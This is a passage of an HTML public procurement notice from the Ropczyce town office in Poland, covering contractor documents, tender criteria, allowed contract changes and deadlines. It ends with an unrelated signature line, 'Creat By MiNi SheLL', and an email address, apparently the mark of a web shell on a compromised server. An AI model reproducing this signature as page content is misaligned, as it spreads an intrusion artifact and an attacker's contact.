<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3. Jeżeli Wykonawca, wykazując spełnianie warunków, o których w art. 22 ust. 1 ustawy PZP, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy PZP, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w ust. 2 rozdziału XII SIWZ.
4. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia oraz Załącznik Nr 8 do SIWZ.
5. Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy PZP, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy PZP, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dołączenia przez Wykonawcę do oferty dokumentów dotyczących w szczególności: 
1) zakresu dostępnych Wykonawcy zasobów innego podmiotu, 
2) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, 
3) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, 
4) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 
11. Wykonawcy występujący wspólnie o udzielenie zamówienia są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający dopuszcza możliwość n/w zmian umowy:
1/ Zmiany kolejności i terminów wykonania poszczególnych zakresów robót określonych w harmonogramie rzeczowo - finansowym, stanowiącym załącznik Nr 1 do umowy, z przyczyn niezależnych od Wykonawcy, w szczególności w następujących okolicznościach:
- konieczności zwiększenia bezpieczeństwa wykonywania robót budowlanych lub usprawnienia procesu budowy,
- po uzgodnieniu potrzeby wprowadzenia rozwiązań zamiennych,
- zawieszenia robót lub zaistnienia przeszkód spowodowanych lub dających się przypisać Zamawiającemu.
2/ Zmiany w kolejności i terminach wykonywania robót budowlanych, nie powodujących wydłużenia terminu zakończenia przedmiotu umowy. Zmiany te wymagają akceptacji Zamawiającego, nie wymagają aneksu do umowy lecz poinformowania drugiej strony w formie pisemnej.
3/ Wykonania i zafakturowania w 2016 r. części robót planowanych do wykonania w roku 2017 w przypadku pozyskania przez zamawiającego dodatkowych środków finansowych na ten cel. 
4/ Jeżeli w toku realizacji robót wystąpi konieczność zmniejszenia zakresu uprzedniego zamówienia Zamawiający uprawniony jest ograniczyć zakres robót i/lub urządzeń, do czego nie jest wymagana zgoda Wykonawcy, wysokość wynagrodzenia ryczałtowego ulegnie wtedy odpowiednio zmniejszeniu o kwotę wynikającą z wyliczenia polegającego na przemnożeniu ilości nie wykonanych robót przez ceny jednostkowe robót zawarte w kosztorysie złożonym przez Wykonawcę przed podpisaniem umowy, stosownie do obowiązku wynikającego z treści rozdziału XX ust. 3  pkt. 3.3 SIWZ.
5/ Zmiany ceny w przypadku ustawowej zmiany stawki podatku od towarów i usług, wówczas cena ulegnie zmianie w ten sposób, że do ceny netto zostanie doliczony podatek VAT w wysokości wynikającej z przepisów.
6/ Zmiany którejkolwiek z osób wykazanych w ofercie Wykonawcy, a przewidzianych do kierowania robotami realizowanymi w ramach niniejszego zamówienia, mogą nastąpić jedynie na osobę spełniającą wymagane w SIWZ warunki w zakresie kwalifikacji zawodowych, doświadczenia i wykształcenia. Zmiany te wymagają akceptacji Zamawiającego, nie wymagają aneksu do umowy lecz poinformowania drugiej strony w formie pisemnej i potwierdzenia w dzienniku budowy.
2. Zmiany, o których mowa w ust. 1 niniejszego rozdziału, muszą być każdorazowo zatwierdzone przez Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ropczyce.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ropczycach, ul. Krisego 1, 39-100 Ropczyce, pokój nr 210.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2016 godzina 09:30, miejsce: Urząd Miejski w Ropczycach, ul. Krisego 1, 39-100 Ropczyce, pokój nr 208 (Sekretariat, II p.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie nr 2 planowane jest do dofinansowania ze środków UE w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014 - 2020, Działanie 3.2. Modernizacja energetyczna budynków.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com